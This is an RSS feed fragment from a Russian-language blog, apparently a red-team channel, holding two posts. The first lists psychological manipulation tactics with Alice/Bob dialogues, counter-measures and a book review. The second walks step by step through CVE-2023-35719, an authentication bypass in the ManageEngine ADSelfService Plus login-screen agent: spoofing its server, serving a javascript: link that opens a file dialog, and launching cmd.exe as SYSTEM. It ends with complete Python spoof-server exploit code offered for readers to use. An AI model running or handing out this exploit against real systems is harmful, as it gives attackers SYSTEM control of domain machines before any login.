  <p id="tqSs"><strong>Мнимая невнимательность</strong> - это тип манипуляции, при котором манипулятор делает вид, что не обращает внимания на оппонента или его просьбы, чтобы создать впечатление, что он невнимателен или недостаточно заинтересован в ситуации. Затем манипулятор может использовать эту мнимую невнимательность в свою пользу, чтобы добиться желаемого результата и отразить ответственность за свои действия на оппонента.</p>
  <p id="ixNz"><u>Пример диалога между Алисой и Бобом:</u></p>
  <ul id="46ur">
    <li id="SgRq"><strong>Алиса:</strong> (обращается к Бобу) Боб, я хотела бы обсудить наше партнерство и внести некоторые предложения по улучшению сотрудничества.</li>
    <li id="SSuI"><strong>Боб:</strong> (прикидывается невнимательным) Извини, Алиса, я сейчас занят. Можем поговорить об этом позже?</li>
    <li id="E5Du"><strong>Алиса:</strong> Но это довольно важно, и у нас есть возможность решить некоторые проблемы, если начнем обсуждение сейчас.</li>
    <li id="TX1B"><strong>Боб:</strong> (опять проигнорировал) Я думаю, у нас будет время поговорить об этом завтра, когда у меня будет больше свободы.</li>
    <li id="kSHt">(На следующий день)</li>
    <li id="1XE9"><strong>Алиса:</strong> Боб, вчера я пыталась поговорить с тобой о нашем партнерстве, но ты меня игнорировал.</li>
    <li id="7Rod"><strong>Боб:</strong> (прикидывается удивленным) Неужели? Извини, наверное, я был слишком занят. Но давай обсудим это сейчас.</li>
    <li id="hT9w">(Алиса высказывает свои предложения и проблемы, но Боб, будучи предвзят к своим интересам, не проявляет интереса к ее предложениям)</li>
    <li id="VBDR"><strong>Боб:</strong> (в конце беседы) Я подумаю об этом и, возможно, что-то изменится в будущем.</li>
    <li id="RGmi"><strong>Алиса:</strong> (чувствует разочарование) Хорошо, спасибо за то, что все же выслушал меня.</li>
  </ul>
  <p id="k1cd">В данном примере, Боб манипулирует ситуацией, делая вид, что он занят и не обращает внимания на Алису, когда та хочет обсудить важные вопросы партнерства. Затем он использует свою мнимую невнимательность в качестве оправдания своего отсутствия интереса к предложениям Алисы. Это позволяет ему отразить ответственность за отсутствие диалога на нее, хотя на самом деле он просто не заинтересован в ее предложениях. Это делает Алису уязвимой для манипуляций и оставляет ее чувствующей себя непонятой и недооцененной.</p>
  <hr />
  <p id="JZwW"><strong>Скажи «да», или путь к согласию</strong> - это тип манипуляции, при котором манипулятор стремится получить согласие оппонента на свои предложения, идеи или действия, создавая ситуацию, в которой оппонент постоянно соглашается с его словами или предложениями. Манипулятор умело направляет диалог таким образом, чтобы оппонент постепенно поддавался давлению и принимал решения, которые могут быть не в его интересах.</p>
  <p id="KIyh"><u>Пример диалога между Алисой и Бобом:</u></p>
  <ul id="DsDy">
    <li id="utWE"><strong>Алиса:</strong> Боб, у меня есть замечательная идея по развитию нашего проекта. Я думаю, мы можем сделать ряд изменений, которые помогут увеличить нашу прибыль и привлечь больше клиентов.</li>
    <li id="jjlC"><strong>Боб:</strong> Да, конечно, расскажи свою идею.</li>
    <li id="n5dL"><strong>Алиса:</strong> Прекрасно! Во-первых, мы можем улучшить наш сайт и сделать его более привлекательным для пользователей. Во-вторых, стоит провести акции и скидки для привлечения новых клиентов. И, наконец, мы можем расширить нашу рекламную кампанию в социальных сетях.</li>
    <li id="4Vxa"><strong>Боб:</strong> Да, это звучит неплохо.</li>
    <li id="Bkyi"><strong>Алиса:</strong> Я также думаю, что нам следует сосредоточиться на разработке нового продукта, который будет соответствовать текущим трендам рынка.</li>
    <li id="7EVL"><strong>Боб:</strong> Да, действительно, это может помочь нам привлечь больше клиентов.</li>
    <li id="hz9w"><strong>Алиса:</strong> Вот и отлично! Значит, ты согласен с моими предложениями?</li>
    <li id="0Re3"><strong>Боб:</strong> Да, я согласен.</li>
    <li id="voPa"><strong>Алиса:</strong> Отлично, я рада, что мы нашли общий язык. Мы начнем реализовывать эти идеи как можно скорее.</li>
  </ul>
  <p id="J3ie">В данном примере, Боб постоянно соглашается с идеями Алисы, и она использует это согласие, чтобы проталкивать свои предложения и планы. Манипулятор направляет диалог таким образом, чтобы Боб почувствовал, что его согласие важно, и он начинает принимать решения, которые могут быть манипулятивными и не всегда соответствовать его интересам. Это делает его уязвимым перед влиянием манипулятора и может привести к принятию нежелательных решений.</p>
  <hr />
  <p id="aNzD"><strong>Неожиданное цитирование, или слова оппонента в качестве доказательства</strong> - это тип манипуляции, при котором манипулятор цитирует или перефразирует слова оппонента таким образом, чтобы использовать их как доказательство или аргумент в свою пользу. Это делается с целью обескураживания оппонента и создания иллюзии, что манипулятор прав и основывает свои действия на словах самого оппонента.</p>
  <p id="0pNv"><u>Пример диалога между Алисой и Бобом:</u></p>
  <ul id="Pu50">
    <li id="Ik0e"><strong>Алиса:</strong> Боб, я заметила, что у тебя последнее время много свободного времени. Может быть, ты можешь помочь мне с проектом, который я разрабатываю?</li>
    <li id="ueHR"><strong>Боб:</strong> Конечно, я всегда рад помочь. Но у меня тоже есть свои дела, которыми нужно заниматься.</li>
    <li id="cQNO"><strong>Алиса:</strong> Да, я понимаю, что у тебя дел хватает. Но, помнишь, пару недель назад ты сказал, что всегда готов помочь мне в случае необходимости. Вот тогда ты был таким же занятым, но нашел время и помог мне.</li>
    <li id="NV0e"><strong>Боб:</strong> Да, я помню, но в тот раз у меня было меньше дел.</li>
    <li id="dUuK"><strong>Алиса:</strong> Ты сам сказал, что всегда рад помочь, вне зависимости от количества дел. Вот твои слова: &quot;Я всегда готов помочь тебе.&quot;</li>
    <li id="Fb5Q"><strong>Боб:</strong> Хорошо, я попробую найти время и помочь тебе.</li>
    <li id="93Pj"><strong>Алиса:</strong> Спасибо, я знала, что ты не откажешь. Ты такой замечательный друг!</li>
  </ul>
  <p id="dnzH">В данном примере, Алиса цитирует слова Боба, сделанные ранее, и использует их для убеждения его помочь ей с проектом. Манипулятор (Алиса) создает образ доброжелательного и отзывчивого друга, который всегда готов помочь, и использует эти слова как доказательство его обязательств и согласия помочь. Это заставляет Боба чувствовать себя обязанным помочь, даже если у него есть другие дела. Алиса таким образом добивается своей цели, применяя неожиданное цитирование для убеждения оппонента в своей правоте.</p>
  <hr />
  <p id="Hhbz"><strong>Эффект наблюдения, или поиск общих черт</strong> - это тип манипуляции, при котором манипулятор ищет или создает впечатление общих черт или схожести между собой и манипулируемым. Затем манипулятор использует эти общие черты, чтобы примирить или убедить манипулируемого и протолкнуть свою идею или предложение.</p>
  <p id="Cg0a"><u>Пример диалога между Алисой и Бобом:</u></p>
  <ul id="95Dz">
    <li id="DvdZ"><strong>Алиса:</strong> Боб, я заметила, что у тебя тоже есть интерес к искусству. Я недавно узнала, что ты любишь рисовать. Как я рада, что у нас так много общего интересов!</li>
    <li id="uNPT"><strong>Боб:</strong> Да, я правда увлекаюсь рисованием, но это просто хобби. Я не особо хорош в этом.</li>
    <li id="fgvz"><strong>Алиса:</strong> Но это так здорово, что у нас есть общий интерес! Ты знаешь, я тоже раньше увлекалась рисованием, и, хотя я давно не занимаюсь этим, я всегда нахожу вдохновение, когда вижу, как кто-то рисует. Может быть, мы можем вместе пойти на выставку искусства или посидеть в кафе и нарисовать что-нибудь?</li>
    <li id="flaw"><strong>Боб:</strong> Ну, почему бы и нет? Мне было бы интересно посмотреть на твои работы.</li>
    <li id="Uj0U"><strong>Алиса:</strong> Замечательно! Я знала, что у нас много общего. И вообще, я так рада, что у нас так хорошо клеится общение. Ты такой открытый и интересный собеседник.</li>
    <li id="9S6P"><strong>Боб:</strong> Спасибо, Алиса. Я тоже наслаждаюсь общением с тобой.</li>
  </ul>
  <p id="gp3Z">В данном примере Алиса использует эффект наблюдения, утверждая, что она заметила общий интерес к искусству у Боба и себя. Она акцентирует внимание на этой схожести и пытается примирить Боба с ней, создавая образ &quot;схожести&quot; между ними. Это позволяет ей легче внедрить свою идею о проведении времени вместе и убедить Боба пойти на выставку искусства или заняться рисованием вместе. Алиса добивается своей цели, подчеркивая и расширяя общие черты между ними, чтобы убедить Боба и привести его к желаемому результату.</p>
  <hr />
  <p id="p5De"><strong>Навязывание выбора, или изначально верное решение</strong> - это тип манипуляции, при котором манипулятор задает вопрос таким образом, что фактически ограничивает или искажает выбор оппонента, не оставляя ему других альтернатив, кроме того, которое соответствует желаемому результату манипулятора. Это делается так, чтобы убедить оппонента сделать то, что манипулятор хочет, давая ему ощущение, что это был его собственный выбор.</p>
  <p id="pHt3"><u>Пример диалога между Алисой и Бобом:</u></p>
  <ul id="bi7t">
    <li id="CNpb"><strong>Алиса:</strong> Боб, как ты предпочитаешь провести выходной - поиграть в теннис или сходить на концерт? Я просто думаю, что тебе понравится активный отдых на свежем воздухе.</li>
    <li id="RduA"><strong>Боб:</strong> Ну, на самом деле я бы предпочел отдохнуть дома и посмотреть фильм. Я устал за эту неделю.</li>
    <li id="yjJq"><strong>Алиса:</strong> Но, Боб, давай попробуем сыграть в теннис. Это такой здоровый и веселый способ провести время! Ты же знаешь, что активность на улице придаст тебе энергии, и ты будешь рад, что согласился.</li>
    <li id="prFM"><strong>Боб:</strong> Хорошо, может быть, и правда пойдем поиграем в теннис.</li>
  </ul>
  <p id="Ao4M">В этом примере, Алиса использует навязывание выбора. Она предоставляет Бобу всего два варианта - поиграть в теннис или сходить на концерт, не оставляя ему возможности сделать другой выбор, такой как остаться дома и отдохнуть. Хотя Боб изначально хотел отдохнуть дома, Алиса приводит аргументы, чтобы убедить его выбрать вариант с теннисом, создавая у него впечатление, что это его собственное решение. В результате Боб соглашается с ее предложением, чувствуя, что он сам сделал правильный выбор.</p>
  <hr />
  <p id="6rdz"><strong>Неожиданное откровение, или внезапная честность</strong> - это тип манипуляции, при котором манипулятор использует стратегию внезапного раскрытия личной или секретной информации, представленной как доверительная и предназначенная только для определенного человека. Это может привести к возникновению у оппонента чувства особой важности и доверия к манипулятору, что впоследствии усиливает воздействие манипуляции и позволяет манипулятору внедрить свою ложную информацию или убеждения.</p>
  <p id="4FKx"><u>Пример диалога между Алисой и Бобом:</u></p>
  <ul id="oNIO">
    <li id="Cknx"><strong>Алиса:</strong> Боб, я хочу с тобой поделиться чем-то важным. Ты для меня уже стал близким другом, и я знаю, что могу тебе доверять. Я расскажу тебе то, о чем никому еще не говорила.</li>
    <li id="XRqa"><strong>Боб:</strong> О, конечно, Алиса. Ты знаешь, что я всегда готов выслушать и поддержать тебя.</li>
    <li id="fvKL"><strong>Алиса:</strong> Вот дело в том, что я недавно узнала, что Стивен, наш общий знакомый, рассказывал о нас неправду. Он сказал, что ты говорил о тебе и мне весьма критически. Меня это очень задело, и я решила рассказать тебе об этом. Я не ожидала, что он может так говорить о нас, и мне трудно в это поверить.</li>
    <li id="8kB2"><strong>Боб:</strong> Что? Но это не правда, Алиса! Я никогда бы не сказал ничего такого о нас. Это вымысел Стивена, он просто хочет нас разъединить. Давай разберемся с этим.</li>
  </ul>
  <p id="g1uT">В данном примере, Алиса использует стратегию неожиданного откровения, утверждая, что ей удалось узнать о критических замечаниях Стивена о Бобе и ей. Она представляет себя в роли доверчивого друга, который рассказывает личную информацию, чтобы усилить чувство доверия у Боба и заставить его поверить в ее слова. Боб ощущает, что Алиса действительно доверяет ему, и отрицает обвинения, которые якобы были сделаны Стивеном, таким образом попадая в ловушку манипуляции.</p>
  <hr />
  <p id="3hRZ"><strong>Внезапный контраргумент, или коварная ложь</strong> - это тип манипуляции, при котором манипулятор неожиданно для оппонента ссылается на предполагаемые слова или действия, которые, как он утверждает, были сделаны или сказаны оппонентом ранее. Манипулятор использует этот контраргумент, чтобы дезориентировать оппонента, заставить его почувствовать вину или ослабить его критический настрой, относясь к своим утверждениям с определенной долей правдоподобия.</p>
  <p id="zco9"><u>Пример диалога между Алисой и Бобом:</u></p>
  <ul id="IlR4">
    <li id="i85t"><strong>Алиса:</strong> Боб, помнишь, как мы недавно обсуждали наше новое проектное предложение? Ты говорил, что полностью поддерживаешь мою идею, и мы даже обсудили, как ее реализовать.</li>
    <li id="APFp"><strong>Боб:</strong> Да, конечно, я помню. Я поддерживаю твою идею и действительно думаю, что она имеет потенциал.</li>
    <li id="UkCW"><strong>Алиса:</strong> Ну, тогда почему ты только что сказал нашим коллегам, что эта идея совсем не имеет перспектив и требует множества изменений? Я была уверена, что ты поддержишь меня.</li>
    <li id="vqcf"><strong>Боб:</strong> Что? Я никогда бы не сказал такое. Я действительно поддерживаю идею, которую мы обсуждали. Возможно, произошло недопонимание или уточни, пожалуйста, что именно я сказал.</li>
    <li id="M7z3"><strong>Алиса:</strong> Ну, возможно, я что-то перепутала. Но я была уверена, что слышала именно такие слова.</li>
  </ul>
  <p id="mnMJ">В данном примере, Алиса использует внезапный контраргумент, утверждая, что Боб сказал одно, но затем представляет его слова в негативном свете, оспаривая его поддержку идеи проекта. Это создает дезориентацию у Боба и заставляет его чувствовать себя обвиненным или недопонятым. Боб отрицает свои якобы произнесенные слова и пытается разъяснить недопонимание, но Алиса продолжает настаивать на своем замечании, что создает у Боба чувство вины и смятения.</p>
  <hr />
  <p id="2YUt"><strong>Обвинение в теории, или мнимое отсутствие практики</strong> - это тип манипуляции, при котором манипулятор неожиданно контраргументирует слова оппонента, утверждая, что их идеи или предложения хороши только на бумаге или в теории, но на практике они не работают или не имеют реальной ценности. Манипулятор использует это обвинение, чтобы оспорить слова оппонента и подорвать его уверенность в собственных идеях или решениях.</p>
  <p id="C7gP"><u>Пример диалога между Алисой и Бобом:</u></p>
  <ul id="biGg">
    <li id="vKyj"><strong>Алиса:</strong> Я думаю, что наша компания должна инвестировать в исследования и разработки новых продуктов. Это поможет нам оставаться конкурентоспособными на рынке и привлечь больше клиентов.</li>
    <li id="N2qr"><strong>Боб:</strong> Но это будет стоить нам очень дорого, и я сомневаюсь, что новые продукты принесут ожидаемую прибыль. Это выглядит хорошо только на бумаге, но на практике, возможно, не сработает.</li>
    <li id="B7iq"><strong>Алиса:</strong> Но у нас уже есть успешные примеры продуктов, которые были разработаны после серьезных исследований. Я уверена, что это может сработать и на этот раз.</li>
    <li id="TvjJ"><strong>Боб:</strong> Ты всегда говоришь о наших предыдущих успехах, но смотришь ли ты на недавние неудачи? Нам нужно ориентироваться на текущую ситуацию, а не на теоретические предположения.</li>
    <li id="sMKs"><strong>Алиса:</strong> Я просто предлагаю искать новые возможности для роста, и инвестиции в исследования - это один из способов достичь этой цели.</li>
    <li id="uPuc"><strong>Боб:</strong> Но инвестирование в теорию не всегда приводит к практическим результатам. Я не хочу тратить деньги на нечто, что может оказаться неэффективным.</li>
  </ul>
  <p id="T5rE">В данном примере, Боб использует обвинение в теории, указывая на то, что идеи Алисы могут выглядеть обещающе на бумаге или в теории, но он подчеркивает, что они не были подтверждены практическим опытом или недавними успехами. Это позволяет ему подорвать уверенность Алисы в ее предложении и убедить ее, что ее идеи являются мнимыми и не имеют реальной ценности для компании.</p>
  <p id="ssIk">На сегодня всё. Я постарался обыграть при помощи всем известных персонажей каждую из популярных тактик. </p>
  <h3 id="oDCK">Вывод</h3>
  <p id="i5fL">Мы рассмотрели различные аспекты манипуляции и их влияние на психику человека. Мы ознакомились с теорией психики Зигмунда Фрейда, которая включает сущности &quot;Я&quot;, &quot;Оно&quot; и &quot;Сверх-Я&quot;, а также цензуру психики. Эти элементы психики взаимодействуют друг с другом и формируют основу нашего поведения и принятия решений.</p>
  <p id="WPjX">Манипуляторы используют знание о структуре психики для воздействия на индивидов и подчинения их воли. Они используют различные методы, такие как усиление конфликтов между сущностями психики, создание ложных убеждений и моральных стандартов, привлечение страхов и тревог, а также изоляция и контроль информации. Целью манипуляторов может быть введение человека в состояние невроза, что ослабляет его сознание и позволяет легче контролировать его поведение и мышление.</p>
  <ul id="HHRu">
    <li id="A1CH">Противодействие манипуляциям:</li>
    <li id="et9p">Повышение осознанности: Важно развивать осознанность к своим мыслям, эмоциям и поведению. Чем больше мы осознаем свои внутренние процессы, тем меньше вероятность быть подверженным манипуляциям.</li>
    <li id="qTwq">Развитие критического мышления: Умение анализировать информацию, задавать вопросы и проверять факты помогает не допустить обмана и ложной информации.</li>
    <li id="WEu6">Укрепление самооценки и уверенности: Чем увереннее и устойчивее вы чувствуете себя, тем сложнее будет подвергнуться манипуляциям, которые направлены на подрыв вашей уверенности.</li>
    <li id="gIQf">Общение и обмен опытом: Важно общаться с другими людьми и обмениваться опытом, чтобы узнать об их подходах к противостоянию манипуляциям и научиться новым стратегиям.</li>
    <li id="7Osu">Отстаивание границ: Умение устанавливать границы и отстаивать свои интересы помогает избежать воздействия манипуляторов.</li>
  </ul>
  <h3 id="ZMnw">Отзыв о книге &quot;Манипулирование личностью и массами&quot; Сергея Зелинского:</h3>
  <p id="p7rP">Сергей Зелинский в предоставляет читателям глубокий анализ механизмов манипуляции, применяемых на уровне личности и общества. Зелинский аргументировано и доступно объясняет теоретические основы манипуляций, а также их практическое применение.</p>
  <p id="dMsT">Книга предоставляет понимание, какие факторы способствуют успешному воздействию на психику людей и какие методы используют манипуляторы для достижения своих целей. Она помогает распознавать признаки манипуляций в повседневной жизни и работе, что позволяет быть более осознанным и защищенным.</p>
  <p id="5IuN">Автор предлагает практические советы и стратегии, которые помогают укрепить психологический иммунитет и защититься от манипуляций. Книга помогает понять себя и других людей глубже, что содействует лучшему взаимодействию в обществе.</p>
  <p id="RXWP">В целом, книга &quot;Манипулирование личностью и массами&quot; заслуживает рекомендации для широкого круга профессионалов в различных областях.</p>
  <h3 id="Ni6S"><a href="https://t.me/ad_pohueque" target="_blank">Подписывайся на AD_POHEQUE и ставь 👾</a></h3>

]]></content:encoded></item><item><guid isPermaLink="true">https://teletype.in/@ad_poheque/povyshenie-privilegij-system-cherez-adselfservice</guid><link>https://teletype.in/@ad_poheque/povyshenie-privilegij-system-cherez-adselfservice?utm_source=teletype&amp;utm_medium=feed_rss&amp;utm_campaign=ad_poheque</link><comments>https://teletype.in/@ad_poheque/povyshenie-privilegij-system-cherez-adselfservice?utm_source=teletype&amp;utm_medium=feed_rss&amp;utm_campaign=ad_poheque#comments</comments><dc:creator>ad_poheque</dc:creator><title>Повышение привилегий до SYSTEM через ADSelfService в конфигурации по умолчанию</title><pubDate>Mon, 03 Jul 2023 02:11:40 GMT</pubDate><media:content medium="image" url="https://img1.teletype.in/files/4e/cb/4ecbb9ed-27e2-4a37-b7fa-0f059fb8681b.png"></media:content><category>Red teaming</category><description><![CDATA[<img src="https://github.com/pedrib/PoC/raw/master/advisories/ManageEngine/adselfpwnplus/pics/login_screen.png"></img>ManageEngine ADSelfService Plus предоставляет интегрированное решение для самостоятельного управления паролями и единого входа. Данное решение помогает пользователям домена выполнять самостоятельный сброс пароля, самостоятельное разблокирование учетной записи, самостоятельное обновление личных данных сотрудника (например, номера мобильного телефона и фотографий) в Microsoft Windows Active Directory.]]></description><content:encoded><![CDATA[
  <p id="27HE">ManageEngine ADSelfService Plus предоставляет интегрированное решение для самостоятельного управления паролями и единого входа. Данное решение помогает пользователям домена выполнять самостоятельный сброс пароля, самостоятельное разблокирование учетной записи, самостоятельное обновление личных данных сотрудника (например, номера мобильного телефона и фотографий) в Microsoft Windows Active Directory.</p>
  <p id="BPw8"><a href="https://t.me/ad_pohueque" target="_blank">Подписывайся на AD_POHEQUE и ставь 👾</a></p>
  <p id="ngbE">ADSelfService Plus устанавливает локальный агент (надстройка для Windows <a href="https://learn.microsoft.com/en-us/windows/win32/secauthn/gina" target="_blank">GINA</a>) на управляемых компьютерах домена Windows, который можно использовать для сброса паролей пользователей Active Directory непосредственно с экрана входа.</p>
  <h3 id="H9ba">GINA</h3>
  <p id="E9ns">Библиотека динамической компоновки (DLL) графической идентификации и проверки подлинности. GINA — это заменяемый компонент DLL, который загружается исполняемым файлом <a href="https://learn.microsoft.com/ru-ru/windows/win32/secgloss/w-gly" target="_blank"><em>Winlogon</em></a> . GINA реализует политику проверки подлинности интерактивной модели входа и, как ожидается, будет выполнять все идентификации и проверки подлинности взаимодействия с пользователем.</p>
  <p id="vUHX">Данная уязвимость позволяет атакующему получить командную оболочку c привилегиям SYSTEM дедовским методом кликнув на  <br />Browse -&gt; C:\Windows\System32\cmd.exe на этапе предаутентификации. 😎</p>
  <p id="SJMW">Похожая уязвимость была обнаружена Bhadresh Patel в 2020 году и исправлена в версии 6.0 сборка 6003.</p>
  <p id="qGh9">Подтверждено, что данная уязвимость работает вплоть до версии ADSelfService Plus<code>4.2.9</code>, 2012 года выпуска, и вплоть до последней версии <code>6.3 Build 6301</code> на момент написания статьи (2023-06-23).</p>
  <p id="BGGA">Экран входа Windows:</p>
  <figure id="qXpo" class="m_original">
    <img src="https://github.com/pedrib/PoC/raw/master/advisories/ManageEngine/adselfpwnplus/pics/login_screen.png" width="1906" />
    <figcaption>Изображение №1: Экран входа Windows с установленной GINA</figcaption>
  </figure>
  <p id="DxS9">Если мы щелкнем на любой из опций в красных рамках выше, мы получим следующий экран, который позволяет сбросить пароль пользователя домена:</p>
  <figure id="K5o9" class="m_original">
    <img src="https://github.com/pedrib/PoC/raw/master/advisories/ManageEngine/adselfpwnplus/pics/normal_screen.png" width="1919" />
    <figcaption>Изображение №2: Сброс пароля пользователя через GINA</figcaption>
  </figure>
  <p id="RSJv">Очевидно, что это работает во встроенном окне браузера. Что произойдет, если мы отключим сеть и GINA не сможет достичь сервера ADSelfService Plus?</p>
  <figure id="XPPT" class="m_original">
    <img src="https://github.com/pedrib/PoC/raw/master/advisories/ManageEngine/adselfpwnplus/pics/cant_reach.png" width="1920" />
    <figcaption>Изображение №3: Невозможность достижения контроллера домена adselfpwnplus.com</figcaption>
  </figure>
  <p id="MIes">Что произойдет, если мы нажмем &quot;Искать этот сайт в Bing&quot;?</p>
  <figure id="w9By" class="m_original">
    <img src="https://github.com/pedrib/PoC/raw/master/advisories/ManageEngine/adselfpwnplus/pics/access_denied.png" width="905" />
    <figcaption>Изображение №4: Отказ в доступе к внешнему URL</figcaption>
  </figure>
  <p id="wTeY"><br />Можно вспомнить золотые техники дедов и попытаться проэкслуатировать простой вектор атаки: перейти в Bing, попытаться найти диалоговое окно для открытия файла и просто запустить cmd.exe от имени SYSTEM!</p>
  <p id="HIzP">К сожалению, так просто не получится. Появляется всплывающее окно с надписью &quot;External URL access is denied.&quot;, и окно закрывается. Ни одна из комбинаций клавиш Internet Explorer не работает, поэтому мы не можем открыть диалоговые окна, использовать сочетания клавиш + CTRL, нажимать клавиши F, &quot;Просмотреть исходный код&quot; и т. д.</p>
  <p id="S06h">Но заметьте, что нашей устройство пытается установить связь с сервером adselfservicepwn.com на порту 8888. <br />Подключим компьютер к другой сети, которую мы контролируем, вне обычной сети домена. Здесь есть много вариантов, мы можем подключить Ethernet-кабель или просто выбрать подконтрольную нам сеть Wi-Fi на экране входа. На сетевое подключение (по умолчанию) нет ограничений на экране предаутентификации входа Windows.</p>
  <p id="tvyE">Подключившись к сети, которую мы контролируем, мы можем подменить сервер adselfpwnplus.com и снова вызвать экран сброса пароля.</p>
  <p id="crxP">Когда GINA пытается получить доступ к хосту adselfpwnplus.com, она отправляет следующий GET запрос:</p>
  <p id="UsUG"><code>GET /AgentStatusUpdate.cc?status=adssp_admin_gina_install_success&amp;machineName=&lt;MACHINE_NAME&gt; &amp;domainName=&lt;DOMAIN_NAME&gt;&amp;version=5.9&amp;defUser=ADSELFPWNPLUS\normaluser&amp; HTTP/1.1</code></p>
  <p id="R8mu">Давайте предоставим AgentStatusUpdate.cc на нашем поддельном сервере и отправим:<br /></p>
  <p id="tupM"><code>&lt;html&gt;&lt;body&gt;&lt;b&gt;HELLO GINA! </code><br /></p>
  <p id="ZVSf">Работает!<br /></p>
  <figure id="NWID" class="m_original">
    <img src="https://github.com/pedrib/PoC/raw/master/advisories/ManageEngine/adselfpwnplus/pics/hello_gina.png" width="1920" />
    <figcaption> Изображение № 5: мы отобразили наш HTML-код</figcaption>
  </figure>
  <p id="6Bem"><br /></p>
  <figure id="olAa" class="m_original">
    <img src="https://github.com/pedrib/PoC/raw/master/advisories/ManageEngine/adselfpwnplus/pics/hello_blocked.png" width="902" />
    <figcaption>Изображение №6: Диалоговые окна файлов удаляются</figcaption>
  </figure>
  <p id="2kZO">Похоже, что что-то удалило наше диалоговое окно файла, осталась только строка hello. И это происходит практически с любой техникой, которую можно придумать:</p>
  <pre id="xcAA">&lt;a href=&quot;C:\windows\&quot; /a&gt;Директорию Windows не открыть&lt;/a&gt;
&lt;script&gt;document.write(&#x27;&lt;input/type=file&gt;&#x27;)&lt;/script&gt;
&lt;input type=&quot;file&quot; id=&quot;myfile&quot; name=&quot;myfile&quot;&gt;
&lt;a href=&quot;mailto:me@mail.com&quot;&gt;Это не работает&lt;/a&gt;
&lt;a href=&quot;file:///c:\&quot;&gt;тем более не работает&lt;/a&gt;</pre>
  <p id="1LHj">Отображаемый HTML, отображаемому во встроенном окне браузера GINA, имеет какой-то черный список тегов или удаляет потенциально рисковый пользовательский ввод. Но была обнаружена годная статья <a href="https://systemweakness.com/give-me-a-browser-ill-give-you-a-shell-de19811defa0" target="_blank">&quot;Give me a browser, I&#x27;ll give you a Shell&quot; от Rend,</a> в которой говорится:</p>
  <p id="yOoD">Если инструменты разработчика отключены по какой-либо причине, вы можете использовать один интересный протокол: <strong>javascript</strong>. Если браузер основан на Chromium, вы можете ввести это в строке URL и получить желаемый результат: <br /><br /><code>javascript:document.write(&#x27;&lt;input/type=file&gt;&#x27;)</code><br /></p>
  <p id="rDjc">Давайте обновим наш HTML-код:</p>
  <pre id="Jcky">&lt;html&gt;&lt;body&gt;&lt;a href=\&quot;javascript:document.write(&#x27;&lt;input/type=file&gt;&#x27;)\&quot;&gt;Open up your GINA&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</pre>
  <p id="xMzm">Поскольку встроенный браузер - это Microsoft Edge (браузер по умолчанию в Windows 10), основанный на Chromium, мы получаем ссылку, на которую можно нажать (ПРИМЕЧАНИЕ: автор попробовал это в Windows 7 с Internet Explorer 11, и это тоже сработало!):</p>
  <figure id="Nj1F" class="m_original">
    <img src="https://github.com/pedrib/PoC/raw/master/advisories/ManageEngine/adselfpwnplus/pics/gina_link.png" width="903" />
    <figcaption>Изображение №7: Наша заманчивая надпись.</figcaption>
  </figure>
  <p id="hChL">Мы нажимаем на нее и, НАКОНЕЦ, у нас появляется наше диалоговое окно файла!</p>
  <figure id="AhDK" class="m_original">
    <img src="https://github.com/pedrib/PoC/raw/master/advisories/ManageEngine/adselfpwnplus/pics/browse_button.png" width="902" />
    <figcaption>Изображение №8: Диалоговое окно октрытия файла, которое мы так хотели!</figcaption>
  </figure>
  <p id="sefN">Теперь эксплуатация тривиальна: просто перейдите в C:\Windows\System32 и найдите cmd.exe:</p>
  <figure id="EW0z" class="m_original">
    <img src="https://github.com/pedrib/PoC/raw/master/advisories/ManageEngine/adselfpwnplus/pics/open_dialog.png" width="1212" />
    <figcaption>Изображение №9: Кликаем на cmd.exe</figcaption>
  </figure>
  <p id="Nqy0">Щелкните правой кнопкой мыши, нажмите &quot;Открыть&quot; и вот GINA дает нам оболочку SYSTEM перед аутентификацией!</p>
  <figure id="Lep5" class="m_original">
    <img src="https://github.com/pedrib/PoC/raw/master/advisories/ManageEngine/adselfpwnplus/pics/cmd.png" width="1526" />
    <figcaption>Изображение №10: GINA, открывает нам CMD.EXE с привилегиями SYSTEM.</figcaption>
  </figure>
  <p id="G7bu"><br />К слову, более <u>старые версии ADSelfService Plus НЕ блокируют поиск в Bing и не блокируют диалоговые окна HTML-файлов, предоставляя нам еще два способа получить нашу оболочку</u>. Это подтверждено работой хотя бы на версии v4.2.9.</p>
  <p id="yHMS">Выводы авторов:</p>
  <ul id="UBZ4">
    <li id="rGVr">Черные списки не работают. </li>
    <li id="qUDF">Очень сложно обезопасить встроенные браузеры в операционной системе Windows. </li>
    <li id="f94I">ManageEngine (разработчики ADSelfService Plus) - это куча говна, которая постоянно взламывается как минимум с 2014 года. </li>
    <li id="vr9N">За годы несколько других исследователей также обнаружили критические уязвимости в продуктах ManageEngine.</li>
  </ul>
  <figure id="ZSKA" class="m_column">
    <iframe src="https://www.youtube.com/embed/u1H8PiOPIKU?autoplay=0&loop=0&mute=0"></iframe>
    <figcaption>Крутейший видеоролик с демонстрацией эксплуатации уязвимости.<br /></figcaption>
  </figure>
  <p id="vtS4">Не сомневаюсь, что ты в силах написать свой код для эксплуатации, но если вдруг сегодня не день Бэкхема, держи код на python ;)</p>
  <pre id="JbzJ">#!/usr/bin/env python3
#
# Python HTTP server for exploiting CVE-2023-35719 / ZDI-23-891
# Auth Bypass to SYSTEM shell in ManageEngine ADSelfService Plus Windows GINA Client
# https://github.com/pedrib/PoC/blob/master/advisories/ManageEngine/adselfpwnplus/adselfpwnplus.md
#
# By:
#
# Pedro Ribeiro (pedrib@gmail.com|@pedrib1337)
# João Bigotte
# Ashley King
#
# Agile Information Security (https://agileinfosec.co.uk)

from http.server import BaseHTTPRequestHandler, HTTPServer

# HTTPRequestHandler class
class CustomRequestHandler(BaseHTTPRequestHandler):

  # GET
  def do_GET(self):
        # Send response status code
        self.send_response(200)

        # Send headers
        self.send_header(&#x27;Content-type&#x27;,&#x27;text/html&#x27;)
        self.end_headers()

        # Send message back to client
        message = &quot;&lt;html&gt;&lt;body&gt;&lt;a href=\&quot;javascript:document.write(&#x27;&lt;input/type=file&gt;&#x27;)\&quot;&gt;Open up your GINA&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;&quot;

        # Write content as utf-8 data
        self.wfile.write(bytes(message, &quot;utf8&quot;))
        print(&quot;done&quot;)
        return

def run():
  print(&#x27;starting server...&#x27;)

  # enter your listening address and port here for the ADSelfService Plus server spoof
  # do not forget to add a dns entry for your domain name to point to this IP
  server_address = (&#x27;13.33.37.1&#x27;, 8888)
  httpd = HTTPServer(server_address, CustomRequestHandler)
  print(&#x27;running server...&#x27;)
  httpd.serve_forever()


run()</pre>
